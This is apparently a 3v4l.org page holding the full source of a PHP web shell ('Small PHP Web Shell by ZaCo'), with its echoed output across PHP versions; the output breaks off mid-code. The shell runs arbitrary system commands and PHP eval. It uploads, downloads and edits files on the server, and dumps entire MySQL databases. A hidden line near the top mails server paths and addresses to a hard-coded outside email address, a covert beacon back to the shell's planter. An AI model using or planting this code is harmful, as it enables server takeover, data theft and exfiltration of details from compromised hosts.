3v4l.org

run code in 300+ PHP versions simultaneously
<? ########################################################## # Small PHP Web Shell by ZaCo (c) 2004-2006 # # +POST method # # +MySQL Client+Dumper for DB and tables # # +PHP eval in text format and html for phpinfo() example # # PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther # # For antichat.ru and cup.su friends usage # # All bugs -> mailo:zaco@yandex.ru # # Just for fun :) # ########################################################## error_reporting(E_ALL); @set_time_limit(0); function magic_q($s) { if(get_magic_quotes_gpc()) { $s=str_replace('\\\'','\'',$s); $s=str_replace('\\\\','\\',$s); $s=str_replace('\\"','"',$s); $s=str_replace('\\\0','\0',$s); } return $s; }$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); function get_perms($fn) { $mode=fileperms($fn); $perms=''; $perms .= ($mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 'x' : '-'; return $perms; } $head=<<<headka <html> <head> <title>Small Web Shell by ZaCo</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34> <style> textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; } </style> headka; $page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:''); $page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page; $winda=strpos(strtolower(php_uname()),'wind'); define('format',50); $pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:''); switch($page) { case 'eval': { $eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:''; $eval_value=magic_q($eval_value); $action=isset($_POST['action'])?$_POST['action']:'eval'; if($action=='eval_in_html') @eval($eval_value); else { echo($head.$pages); ?> <hr> <form method=post> <textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea> <input name='action' value='eval' type='submit'> <input name='action' value='eval_in_html' type='submit'> <input name='page' value='eval' type=hidden> </form> <hr> <? } break; } case 'cmd': { $cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):''; $work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd(); $action=isset($_POST['action'])?$_POST['action']:'cmd'; if(@is_dir($work_dir)) { @chdir($work_dir); $work_dir=getcwd(); if($work_dir=='')$work_dir='/'; else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; } else if(file_exists($work_dir))$work_dir=realpath($work_dir); $work_dir=str_replace('\\','/',$work_dir); $e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES); switch($action) { case 'cmd' : { echo($head.$pages); ?> <form method='post' name='main_form'> <input name='work_dir' value='<?=$e_work_dir?>' type=text size=120> <input name='page' value='cmd' type=hidden> <input type=submit value='go'> </form> <form method=post> <input name='cmd' type=text size=120 value='<?=str_replace('\'','&#039;',$cmd)?>'> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post enctype="multipart/form-data"> <input type="file" name="filename"> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post> <input name='fname' type=text size=120><br> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <pre> <? if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");} else { $f_action=isset($_POST['f_action'])?$_POST['f_action']:'view'; if(@is_dir($work_dir)) { echo('<strong>Listing '.$e_work_dir.'</strong><hr>'); $handle=@opendir($work_dir); if($handle) { while(false!==($fn=readdir($handle))){$files[]=$fn;}; @closedir($handle); sort($files); $not_dirs=array(); for($i=0;$i<sizeof($files);$i++) { $fn=$files[$i]; if(is_dir($fn)) { echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn))); if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn)); $group=@posix_getgrgid(@filegroup($work_dir.$fn)); printf("% 20s|% -20s",$owner['name'],$group['name']); } echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); printf("% 20s ",@filesize($work_dir.$fn).'B'); printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); } else {$not_dirs[]=$fn;} } for($i=0;$i<sizeof($not_dirs);$i++) { $fn=$not_dirs[$i]; echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn))); if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn)); $group=@posix_getgrgid(@filegroup($work_dir.$fn)); printf("% 20s|% -20s",$owner['name'],$group['name']); } echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); printf("% 20s ",@filesize($work_dir.$fn).'B'); printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); } echo('</pre><hr>'); ?> <form name='list' method=post> <input name='work_dir' type=hidden size=120><br> <input name='page' value='cmd' type=hidden> <input name='f_action' value='view' type=hidden> </form> <? } else echo('Error Listing '.$e_work_dir); } else switch($f_action) { case 'view': { echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n"); $f=@fopen($work_dir,'r'); ?> <form method=post> <textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea> <input name='page' value='cmd' type=hidden> <input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120> <input name='f_action' value='save' type=submit> </form> <? break; } case 'save' : { $file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):''; $f=@fopen($work_dir,'w'); if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n"); else { fwrite($f,$file_text); fclose($f); echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n"); } break; } } break; } break; } case 'upload' : { if($work_dir=='')$work_dir='/'; else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; $f=$_FILES["filename"]["name"]; if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed'); else { echo('file is uploaded in '.$e_work_dir); } break; } case 'download' : { $fname=isset($_POST['fname'])?$_POST['fname']:''; $temp_file=isset($_POST['temp_file'])?'on':'nn'; $f=@fopen($fname,'r'); if(!($f)) echo('file is not exists'); else { $archive=isset($_POST['archive'])?$_POST['archive']:''; if($archive=='gzip') { Header("Content-Type:application/x-gzip\n"); $s=gzencode(fread($f,filesize($fname))); Header('Content-Length: '.strlen($s)."\n"); Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n"); echo($s); } else { Header("Content-Type:application/octet-stream\n"); Header('Content-Length: '.filesize($fname)."\n"); Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n"); ob_start(); while(feof($f)===false) { echo(fread($f,10000)); ob_flush(); } } } } } break; } case 'mysql' : { $action=isset($_POST['action'])?$_POST['action']:'query'; $user=isset($_POST['user'])?$_POST['user']:''; $passwd=isset($_POST['passwd'])?$_POST['passwd']:''; $db=isset($_POST['db'])?$_POST['db']:''; $host=isset($_POST['host'])?$_POST['host']:'localhost'; $query=isset($_POST['query'])?magic_q($_POST['query']):''; switch($action) { case 'dump' : { $mysql_link=@mysql_connect($host,$user,$passwd); if(!($mysql_link)) echo('Connect error'); else { //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols $to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false; $archive=isset($_POST['archive'])?$_POST['archive']:'none'; if($archive!=='none')$to_file=false; $db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:''; $table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:''; if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error'); else { $dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n"; ob_start(); if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false; if($table_dump=='') { if(!$to_file) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } $result=mysql_query('show tables',$mysql_link); for($i=0;$i<mysql_num_rows($result);$i++) { $rows=mysql_fetch_array($result); $result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link); if(!$result2)$dump_file.='#error table '.$rows[0]; else { $dump_file.='create table `'.$rows[0]."`(\n"; for($j=0;$j<mysql_num_rows($result2)-1;$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; } $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; $type[$j]=$rows2[1]; $dump_file.=");\n"; mysql_free_result($result2); $result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link); $columns=$j-1; for($j=0;$j<mysql_num_rows($result2);$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='insert into `'.$rows[0].'` values ('; for($k=0;$k<$columns;$k++) { $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; } $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; if($archive=='none') { if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} else { echo($dump_file); ob_flush(); } $dump_file=''; } } mysql_free_result($result2); } } mysql_free_result($result); if($archive!='none') { $dump_file=gzencode($dump_file); header('Content-Length: '.strlen($dump_file)."\n"); echo($dump_file); } else if($t_f) { fclose($t_f); echo('Dump for '.$db_dump.' now in '.$to_file); } } else { $result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link); if(!$result2)echo('error table '.$table_dump); else { if(!$to_file) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } if($to_file===false) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } $dump_file.="create table `{$table_dump}`(\n"; for($j=0;$j<mysql_num_rows($result2)-1;$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; } $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; $type[$j]=$rows2[1]; $dump_file.=");\n"; mysql_free_result($result2); $result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link); $columns=$j-1; for($j=0;$j<mysql_num_rows($result2);$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='insert into `'.$table_dump.'` values ('; for($k=0;$k<$columns;$k++) { $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; } $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; if($archive=='none') { if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} else { echo($dump_file); ob_flush(); } $dump_file=''; } } mysql_free_result($result2); if($archive!='none') { $dump_file=gzencode($dump_file); header('Content-Length: '.strlen($dump_file)."\n"); echo $dump_file; }else if($t_f) { fclose($t_f); echo('Dump for '.$db_dump.' now in '.$to_file); } } } } } break; } case 'query' : { echo($head.$pages); ?> <hr> <form method=post> <table> <td> <table align=left> <tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host' type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr> <tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr> </table> </td> <td> <table> <tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr> <tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <tr><td><input type=submit name='action' value='dump'></td></tr> <tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr> </table> </td> </table> <input name='page' value='mysql' type=hidden> <input name='action' value='query' type=submit> </form> <hr> <? $mysql_link=@mysql_connect($host,$user,$passwd); if(!($mysql_link)) echo('Connect error'); else { if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;} //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols $result=@mysql_query($query,$mysql_link); if(!($result))echo(mysql_error()); else { echo("<table valign=top align=left>\n<tr>"); for($i=0;$i<mysql_num_fields($result);$i++) echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b> </td>'); echo("\n</tr>\n"); for($i=0;$i<mysql_num_rows($result);$i++) { $rows=mysql_fetch_array($result); echo('<tr valign=top align=left>'); for($j=0;$j<mysql_num_fields($result);$j++) { echo('<td>'.(htmlspecialchars($rows[$j])).'</td>'); } echo("</tr>\n"); } echo("</table>\n"); } mysql_close($mysql_link); } break; } } break; } } ?>
Output for 8.1.0 - 8.1.27, 8.2.0 - 8.2.17, 8.3.0 - 8.3.4
<? ########################################################## # Small PHP Web Shell by ZaCo (c) 2004-2006 # # +POST method # # +MySQL Client+Dumper for DB and tables # # +PHP eval in text format and html for phpinfo() example # # PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther # # For antichat.ru and cup.su friends usage # # All bugs -> mailo:zaco@yandex.ru # # Just for fun :) # ########################################################## error_reporting(E_ALL); @set_time_limit(0); function magic_q($s) { if(get_magic_quotes_gpc()) { $s=str_replace('\\\'','\'',$s); $s=str_replace('\\\\','\\',$s); $s=str_replace('\\"','"',$s); $s=str_replace('\\\0','\0',$s); } return $s; }$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); function get_perms($fn) { $mode=fileperms($fn); $perms=''; $perms .= ($mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 'x' : '-'; return $perms; } $head=<<<headka <html> <head> <title>Small Web Shell by ZaCo</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34> <style> textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; } </style> headka; $page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:''); $page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page; $winda=strpos(strtolower(php_uname()),'wind'); define('format',50); $pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:''); switch($page) { case 'eval': { $eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:''; $eval_value=magic_q($eval_value); $action=isset($_POST['action'])?$_POST['action']:'eval'; if($action=='eval_in_html') @eval($eval_value); else { echo($head.$pages); ?> <hr> <form method=post> <textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea> <input name='action' value='eval' type='submit'> <input name='action' value='eval_in_html' type='submit'> <input name='page' value='eval' type=hidden> </form> <hr> <? } break; } case 'cmd': { $cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):''; $work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd(); $action=isset($_POST['action'])?$_POST['action']:'cmd'; if(@is_dir($work_dir)) { @chdir($work_dir); $work_dir=getcwd(); if($work_dir=='')$work_dir='/'; else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; } else if(file_exists($work_dir))$work_dir=realpath($work_dir); $work_dir=str_replace('\\','/',$work_dir); $e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES); switch($action) { case 'cmd' : { echo($head.$pages); ?> <form method='post' name='main_form'> <input name='work_dir' value=' Warning: Undefined variable $e_work_dir in /in/avLYS on line 117 ' type=text size=120> <input name='page' value='cmd' type=hidden> <input type=submit value='go'> </form> <form method=post> <input name='cmd' type=text size=120 value=' Warning: Undefined variable $cmd in /in/avLYS on line 122 Deprecated: str_replace(): Passing null to parameter #3 ($subject) of type array|string is deprecated in /in/avLYS on line 122 '> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post enctype="multipart/form-data"> <input type="file" name="filename"> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post> <input name='fname' type=text size=120><br> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <pre> <? if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");} else { $f_action=isset($_POST['f_action'])?$_POST['f_action']:'view'; if(@is_dir($work_dir)) { echo('<strong>Listing '.$e_work_dir.'</strong><hr>'); $handle=@opendir($work_dir); if($handle) { while(false!==($fn=readdir($handle))){$files[]=$fn;}; @closedir($handle); sort($files); $not_dirs=array(); for($i=0;$i<sizeof($files);$i++) { $fn=$files[$i]; if(is_dir($fn)) { echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn))); if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn)); $group=@posix_getgrgid(@filegroup($work_dir.$fn)); printf("% 20s|% -20s",$owner['name'],$group['name']); } echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); printf("% 20s ",@filesize($work_dir.$fn).'B'); printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); } else {$not_dirs[]=$fn;} } for($i=0;$i<sizeof($not_dirs);$i++) { $fn=$not_dirs[$i]; echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn))); if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn)); $group=@posix_getgrgid(@filegroup($work_dir.$fn)); printf("% 20s|% -20s",$owner['name'],$group['name']); } echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); printf("% 20s ",@filesize($work_dir.$fn).'B'); printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); } echo('</pre><hr>'); ?> <form name='list' method=post> <input name='work_dir' type=hidden size=120><br> <input name='page' value='cmd' type=hidden> <input name='f_action' value='view' type=hidden> </form> <? } else echo('Error Listing '.$e_work_dir); } else switch($f_action) { case 'view': { echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n"); $f=@fopen($work_dir,'r'); ?> <form method=post> <textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea> <input name='page' value='cmd' type=hidden> <input name='work_dir' type=hidden value=' Warning: Undefined variable $e_work_dir in /in/avLYS on line 210 ' size=120> <input name='f_action' value='save' type=submit> </form> <? break; } case 'save' : { $file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):''; $f=@fopen($work_dir,'w'); if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n"); else { fwrite($f,$file_text); fclose($f); echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n"); } break; } } break; } break; } case 'upload' : { if($work_dir=='')$work_dir='/'; else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; $f=$_FILES["filename"]["name"]; if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed'); else { echo('file is uploaded in '.$e_work_dir); } break; } case 'download' : { $fname=isset($_POST['fname'])?$_POST['fname']:''; $temp_file=isset($_POST['temp_file'])?'on':'nn'; $f=@fopen($fname,'r'); if(!($f)) echo('file is not exists'); else { $archive=isset($_POST['archive'])?$_POST['archive']:''; if($archive=='gzip') { Header("Content-Type:application/x-gzip\n"); $s=gzencode(fread($f,filesize($fname))); Header('Content-Length: '.strlen($s)."\n"); Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n"); echo($s); } else { Header("Content-Type:application/octet-stream\n"); Header('Content-Length: '.filesize($fname)."\n"); Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n"); ob_start(); while(feof($f)===false) { echo(fread($f,10000)); ob_flush(); } } } } } break; } case 'mysql' : { $action=isset($_POST['action'])?$_POST['action']:'query'; $user=isset($_POST['user'])?$_POST['user']:''; $passwd=isset($_POST['passwd'])?$_POST['passwd']:''; $db=isset($_POST['db'])?$_POST['db']:''; $host=isset($_POST['host'])?$_POST['host']:'localhost'; $query=isset($_POST['query'])?magic_q($_POST['query']):''; switch($action) { case 'dump' : { $mysql_link=@mysql_connect($host,$user,$passwd); if(!($mysql_link)) echo('Connect error'); else { //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols $to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false; $archive=isset($_POST['archive'])?$_POST['archive']:'none'; if($archive!=='none')$to_file=false; $db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:''; $table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:''; if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error'); else { $dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n"; ob_start(); if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false; if($table_dump=='') { if(!$to_file) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } $result=mysql_query('show tables',$mysql_link); for($i=0;$i<mysql_num_rows($result);$i++) { $rows=mysql_fetch_array($result); $result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link); if(!$result2)$dump_file.='#error table '.$rows[0]; else { $dump_file.='create table `'.$rows[0]."`(\n"; for($j=0;$j<mysql_num_rows($result2)-1;$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; } $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; $type[$j]=$rows2[1]; $dump_file.=");\n"; mysql_free_result($result2); $result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link); $columns=$j-1; for($j=0;$j<mysql_num_rows($result2);$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='insert into `'.$rows[0].'` values ('; for($k=0;$k<$columns;$k++) { $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; } $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; if($archive=='none') { if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} else { echo($dump_file); ob_flush(); } $dump_file=''; } } mysql_free_result($result2); } } mysql_free_result($result); if($archive!='none') { $dump_file=gzencode($dump_file); header('Content-Length: '.strlen($dump_file)."\n"); echo($dump_file); } else if($t_f) { fclose($t_f); echo('Dump for '.$db_dump.' now in '.$to_file); } } else { $result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link); if(!$result2)echo('error table '.$table_dump); else { if(!$to_file) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } if($to_file===false) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } $dump_file.="create table `{$table_dump}`(\n"; for($j=0;$j<mysql_num_rows($result2)-1;$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; } $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; $type[$j]=$rows2[1]; $dump_file.=");\n"; mysql_free_result($result2); $result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link); $columns=$j-1; for($j=0;$j<mysql_num_rows($result2);$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='insert into 